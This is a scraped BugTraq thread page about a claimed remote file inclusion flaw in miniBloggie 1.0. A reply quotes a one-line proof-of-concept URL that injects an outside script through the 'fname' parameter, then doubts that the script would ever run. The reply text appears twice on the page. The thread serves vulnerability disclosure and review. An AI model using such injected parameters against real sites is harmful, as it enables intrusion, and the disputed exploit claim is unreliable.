BugTraq
Back to list
|
Post reply
miniBloggie <= 1.0 (fname) Remote File Inclusion Vulnerability
Aug 10 2006 08:38PM
sh3ll sh3ll ir
(1 replies)
Re: miniBloggie <= 1.0 (fname) Remote File Inclusion Vulnerability
Aug 13 2006 12:31PM
Carsten Eilers (ceilers-lists gmx de)
sh3ll (at) sh3ll (dot) ir [email concealed] schrieb am Thu, 10 Aug 2006 20:38:38 +0000:
>PoC:
>
>~~~
>
>http://www.target.com/[miniBloggie]/cls_fast_template.php?fname=[Evil Script]
Now you have your evil script included in a function.
But how would you call the function, to execute your
script?
Regards
Carsten
--
Dipl.-Inform. Carsten Eilers
IT-Sicherheit und Datenschutz
<http://www.ceilers-it.de>
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
>PoC:
>
>~~~
>
>http://www.target.com/[miniBloggie]/cls_fast_template.php?fname=[Evil Script]
Now you have your evil script included in a function.
But how would you call the function, to execute your
script?
Regards
Carsten
--
Dipl.-Inform. Carsten Eilers
IT-Sicherheit und Datenschutz
<http://www.ceilers-it.de>
[ reply ]